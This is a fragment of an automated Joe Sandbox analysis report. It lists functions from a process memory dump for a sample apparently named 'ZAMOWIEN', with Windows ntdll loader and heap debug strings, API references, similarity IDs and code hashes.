                                                                                  Strings
                                                                                  • Actx , xrefs: 37739315
                                                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37739153
                                                                                  • GsHd, xrefs: 376ED794
                                                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 37739372
                                                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 3773914E, 37739173
                                                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37739178
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                  • API String ID: 3446177414-2196497285
                                                                                  • Opcode ID: 87e5acef69ddfce3f8fdab31ac7159284763af43680d5a3ce2504c08bb69d3ee
                                                                                  • Instruction ID: 50e876c213f9315bb2302749bdd860bbff424dd07bb6a4edc31b86f35147881a
                                                                                  • Opcode Fuzzy Hash: 87e5acef69ddfce3f8fdab31ac7159284763af43680d5a3ce2504c08bb69d3ee
                                                                                  • Instruction Fuzzy Hash: DCE1B6746053418FE710CF24C990B5BB7E9BF88368F404A6DE895AB682D771E845CFA2
                                                                                  APIs
                                                                                  • RtlDebugPrintTimes.NTDLL ref: 376C651C
                                                                                    • Part of subcall function 376C6565: RtlDebugPrintTimes.NTDLL ref: 376C6614
                                                                                    • Part of subcall function 376C6565: RtlDebugPrintTimes.NTDLL ref: 376C665F
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 377297A0, 377297C9
                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 377297B9
                                                                                  • apphelp.dll, xrefs: 376C6446
                                                                                  • LdrpInitShimEngine, xrefs: 37729783, 37729796, 377297BF
                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3772977C
                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 37729790
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 3446177414-204845295
                                                                                  • Opcode ID: 56dea5f1d75c82cbc4d12a64057a37d9a46d0dbd542cbd9da1e6b9283e77af55
                                                                                  • Instruction ID: 45cead949f1eae71ab313e251546e2cff4955dfcbcb15888f27df87e54f96bc9
                                                                                  • Opcode Fuzzy Hash: 56dea5f1d75c82cbc4d12a64057a37d9a46d0dbd542cbd9da1e6b9283e77af55
                                                                                  • Instruction Fuzzy Hash: 8E51DF712483019FE720DF20C8A1BAB77E8EF89764F440919F595AB260DB34E904DF97
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                  • API String ID: 3446177414-4227709934
                                                                                  • Opcode ID: 68bbd26d0f4e72a5d79a3287e535a88f9c95f318c0d5b06c20a2a5e01d9ed802
                                                                                  • Instruction ID: 004caec817a1be665784e37e13a784b815e3422db14f153a6ac672c1faa1cd41
                                                                                  • Opcode Fuzzy Hash: 68bbd26d0f4e72a5d79a3287e535a88f9c95f318c0d5b06c20a2a5e01d9ed802
                                                                                  • Instruction Fuzzy Hash: 3F417EB6A00209EFDF01CF95C885AEEBBB6FF4A364F140459E804AB300D731A912CB90
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: $$@$@w1w
                                                                                  • API String ID: 3446177414-3663980583
                                                                                  • Opcode ID: cb8feb65496ab2dfa6799cd7e4359de33f50435a139e05519fb512f173d90711
                                                                                  • Instruction ID: 5b3b6ed08c195e42d337b6a37d6e35749348d99de009665596ccf212e2279e0e
                                                                                  • Opcode Fuzzy Hash: cb8feb65496ab2dfa6799cd7e4359de33f50435a139e05519fb512f173d90711
                                                                                  • Instruction Fuzzy Hash: 16814BB1D012699BEB21CF54CC45BEEB7B8AF08750F0045EAE909B7290D7349E85CFA5
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                  • API String ID: 3446177414-3492000579
                                                                                  • Opcode ID: 6cc1445d62f1078f49ac7b5eac1dc9b07058eab841a1f3f8c1ddcc95489d57df
                                                                                  • Instruction ID: 959ab374e6333580384f443a754c35da611a43661fea4a63b1a3a856262b91e8
                                                                                  • Opcode Fuzzy Hash: 6cc1445d62f1078f49ac7b5eac1dc9b07058eab841a1f3f8c1ddcc95489d57df
                                                                                  • Instruction Fuzzy Hash: 0F71BD75900685EFCF01CF68C5A16BDFBF2FF8A320F048499E455AB251CB399942CB55
                                                                                  APIs
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 37729854, 37729895
                                                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37729843
                                                                                  • LdrpLoadShimEngine, xrefs: 3772984A, 3772988B
                                                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37729885
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 3446177414-3589223738
                                                                                  • Opcode ID: a1222b389e4d64cdffe3ba31b905fc2185387321b438858eb9560aaaa86a5bfc
                                                                                  • Instruction ID: 41f5686805c84b32a480a9f6a3f4eb10ab1cfddee698d288d36a9dab1f4e6f24
                                                                                  • Opcode Fuzzy Hash: a1222b389e4d64cdffe3ba31b905fc2185387321b438858eb9560aaaa86a5bfc
                                                                                  • Instruction Fuzzy Hash: B6513475A003469FDF14CBA8C8A9B9D77B6EF49324F080129E411FF295CB789C11CB86
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                  • API String ID: 3446177414-3224558752
                                                                                  • Opcode ID: b60a8337d647d38f2445310da2026451853e1d9d85c02ee6a44c0574da67f4a7
                                                                                  • Instruction ID: 4d4348fd7e8671b0eac1371ff833de8a74e2bc2c9ee52b23487df33669ac5a2d
                                                                                  • Opcode Fuzzy Hash: b60a8337d647d38f2445310da2026451853e1d9d85c02ee6a44c0574da67f4a7
                                                                                  • Instruction Fuzzy Hash: 1D415875602701DFF701CF24C8A4B5AB7A9EF41374F0489A9E4059B782CB39F981CB96
                                                                                  APIs
                                                                                  Strings
                                                                                  • ---------------------------------------, xrefs: 3777EDF9
                                                                                  • Entry Heap Size , xrefs: 3777EDED
                                                                                  • HEAP: , xrefs: 3777ECDD
                                                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3777EDE3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                  • API String ID: 3446177414-1102453626
                                                                                  • Opcode ID: b94b21989fbb7ac043885c4be7c014ffd29e500980986419f8b2c6cf225c3615
                                                                                  • Instruction ID: be41e965631637cb24b89e78614617307897193912ea18e569989e266b01cd19
                                                                                  • Opcode Fuzzy Hash: b94b21989fbb7ac043885c4be7c014ffd29e500980986419f8b2c6cf225c3615
                                                                                  • Instruction Fuzzy Hash: 81419D79A10252DFCF04CF14C48596ABBE6EF4936472988AAD409AF311C7B5EC62CF80
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                  • API String ID: 3446177414-1222099010
                                                                                  • Opcode ID: b9e23c12d24adeb6ee31d6903951d253f7979e1b4820baa27fd1c6be9cf0bbc0
                                                                                  • Instruction ID: f5a4d0cbe182add0544c7c98cf65f0f1512f0bb50091e3fa7fc44b4189ffa28a
                                                                                  • Opcode Fuzzy Hash: b9e23c12d24adeb6ee31d6903951d253f7979e1b4820baa27fd1c6be9cf0bbc0
                                                                                  • Instruction Fuzzy Hash: FC3167B5202784EFF712CF24C839F5A77A8EF016B4F040899E4015B653CB6AFA41CA53
                                                                                  APIs
                                                                                  Strings
                                                                                  • LdrpFindDllActivationContext, xrefs: 37743440, 3774346C
                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 37743466
                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 3774344A, 37743476
                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 37743439
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                  • API String ID: 3446177414-3779518884
                                                                                  • Opcode ID: ed9662b775131e067bd75fd322420c1232b7627398364ee48d6cc41668978cd8
                                                                                  • Instruction ID: 0ff22ffd8b9481021e0cfe94de9db931a51ae3af421ae6acbd52e2aac431e648
                                                                                  • Opcode Fuzzy Hash: ed9662b775131e067bd75fd322420c1232b7627398364ee48d6cc41668978cd8
                                                                                  • Instruction Fuzzy Hash: E031FBB6A40351AFEB11DB05CC89B6772E5FB4B7B4F428556D4046F150E764AC80CFD2
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 3773A7AF
                                                                                  • DGj7, xrefs: 376F2382
                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3773A79F
                                                                                  • LdrpDynamicShimModule, xrefs: 3773A7A5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DGj7$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-8647285
                                                                                  • Opcode ID: b17405cf6b3693e4167587801f1a458c2cc47688fced28edcea1e78eda339602
                                                                                  • Instruction ID: c369a72941dd01498ccbccdfc3f6bae8e2c13737c21b5071960bf32c56daf1fb
                                                                                  • Opcode Fuzzy Hash: b17405cf6b3693e4167587801f1a458c2cc47688fced28edcea1e78eda339602
                                                                                  • Instruction Fuzzy Hash: B03137B6A40202EFFF108F19C8D6B9E77B5EF88760F110069F901BB251DB785852CB92
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 3446177414-3610490719
                                                                                  • Opcode ID: 7ae6c6d8dccd77db8fef0405493a20119b55b21dc89ffae277bee25f495d97f7
                                                                                  • Instruction ID: b138707144a67a65031daa648e69ba5f5673cbf94af2f18faf9f317462267229
                                                                                  • Opcode Fuzzy Hash: 7ae6c6d8dccd77db8fef0405493a20119b55b21dc89ffae277bee25f495d97f7
                                                                                  • Instruction Fuzzy Hash: 26913772314742EFE715CB24C8A4BAAB3ADEF48650F041899F8509F685DB78EC41CB93
                                                                                  APIs
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 37739F2E
                                                                                  • LdrpCheckModule, xrefs: 37739F24
                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 37739F1C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 3446177414-161242083
                                                                                  • Opcode ID: a6804d020250a723beb053fe3d659ba2c1551518cdef51c7c47787610ceb1b77
                                                                                  • Instruction ID: 55a593169a94ae1d3b8b96658fe90e2095c44744f2bdb7bdaa06269d64693d00
                                                                                  • Opcode Fuzzy Hash: a6804d020250a723beb053fe3d659ba2c1551518cdef51c7c47787610ceb1b77
                                                                                  • Instruction Fuzzy Hash: 01710475A0060ADFEB04CF68C9A5BAEB7F5EF48318F144469E401EB201E73AA942CF51
                                                                                  APIs
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 377480F3
                                                                                  • Failed to reallocate the system dirs string !, xrefs: 377480E2
                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 377480E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 3446177414-1783798831
                                                                                  • Opcode ID: c80ce6ed5aa619443a5a21208a45dff5d3399c71bea87842fef0b5e193f471aa
                                                                                  • Instruction ID: 7cedb6d6599edac3662596f24ae7edd80ba0fce9372f17248812089ea38a655f
                                                                                  • Opcode Fuzzy Hash: c80ce6ed5aa619443a5a21208a45dff5d3399c71bea87842fef0b5e193f471aa
                                                                                  • Instruction Fuzzy Hash: E14116B5540301ABDB20DB24CD55B8B37E9EF49764F005D2AF858EB250DB38D811CF9A
                                                                                  APIs
                                                                                  Strings
                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 37754508
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 37754519
                                                                                  • LdrpCheckRedirection, xrefs: 3775450F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 3446177414-3154609507
                                                                                  • Opcode ID: 6df0d2cfa8c170418fc4902eba6ec7a661db0ecf1ac325aafdfee50475aa4c21
                                                                                  • Instruction ID: a642d9aae784a69804027689e57f467561fb567e5c5ffa018537dc519f9d34fb
                                                                                  • Opcode Fuzzy Hash: 6df0d2cfa8c170418fc4902eba6ec7a661db0ecf1ac325aafdfee50475aa4c21
                                                                                  • Instruction Fuzzy Hash: FA41D2766443119FDB20CF5AC840A6677E6AF487B0F050A59EC98EF351D731EC00CB91
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID: Wow64 Emulation Layer
                                                                                  • API String ID: 3446177414-921169906
                                                                                  • Opcode ID: ff339d4fff61e85147a4e008c567de8bcd2f93f90a65d3e776d64394b2355e4c
                                                                                  • Instruction ID: 6c64eec5a72a2c5ba3b38d5a5559bf6b403759b27c5f4994ed75a0114e94a723
                                                                                  • Opcode Fuzzy Hash: ff339d4fff61e85147a4e008c567de8bcd2f93f90a65d3e776d64394b2355e4c
                                                                                  • Instruction Fuzzy Hash: EC2117B690021EFFAB019BA08D99CFF7B7EEF446E9B040054FA11A6100E734AE11DB75
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 95be7a305d302699e68cd5bd8b5cfa01a616b76c1e4bc658304fe3b998171cf8
                                                                                  • Instruction ID: 457bb5074e8f79016c326ee7e3155d38888d6957751ed5cb6efb7a70f08097b6
                                                                                  • Opcode Fuzzy Hash: 95be7a305d302699e68cd5bd8b5cfa01a616b76c1e4bc658304fe3b998171cf8
                                                                                  • Instruction Fuzzy Hash: 46E12274D00708CFEB25CFA9C9A4A9DBBF9FF48350F10492AE446AB261D776A841CF51
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: d9f6ec3f15105859a6350c2eda9f2be14f6b35cbf303e0213a0e472cab5fdc1d
                                                                                  • Instruction ID: 3505f52324829884364e2c81ee0698fada2ed6f1184b4b9e28450ae7a997d405
                                                                                  • Opcode Fuzzy Hash: d9f6ec3f15105859a6350c2eda9f2be14f6b35cbf303e0213a0e472cab5fdc1d
                                                                                  • Instruction Fuzzy Hash: A2713471E10229DFDF04CFA4C884AEDBBB5BF48364F18442AE905AB244D774A916CF95
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: b852c168b6c865e4b0a811a9e5fac8e02ecd65011c9f09cc133a27d1e8bec20a
                                                                                  • Instruction ID: a326c3a00c1a80aa05c638ffa231627a2745bcf5192d4b7a9a1bb0d36f448c2c
                                                                                  • Opcode Fuzzy Hash: b852c168b6c865e4b0a811a9e5fac8e02ecd65011c9f09cc133a27d1e8bec20a
                                                                                  • Instruction Fuzzy Hash: F5513C75700652EFFB88CE28C8D5A2677F2BB89360B124A7DD506DB710DB75AC51CB80
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: 3012c0f750d89f16c91c4cd491c9f3330288b3fef8c85a9ceb1235da1e218c8b
                                                                                  • Instruction ID: df9eb12a9816dbfa73e03ed662959eacf2be94c1c9bc26ef28cac5bf51447db8
                                                                                  • Opcode Fuzzy Hash: 3012c0f750d89f16c91c4cd491c9f3330288b3fef8c85a9ceb1235da1e218c8b
                                                                                  • Instruction Fuzzy Hash: DE5102B5E10219DFEF08CF99D845AEDBBF2BF48360F15812AE815AB290D774A901CF54
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                  • String ID:
                                                                                  • API String ID: 4281723722-0
                                                                                  • Opcode ID: 46502802d81095ff78d91202be0474018f9399a35408ec01270752a6adc41195
                                                                                  • Instruction ID: 331bb7fef92ded4b07fd200eceb967c3dc297da5af2099427f2423aff1b08e46
                                                                                  • Opcode Fuzzy Hash: 46502802d81095ff78d91202be0474018f9399a35408ec01270752a6adc41195
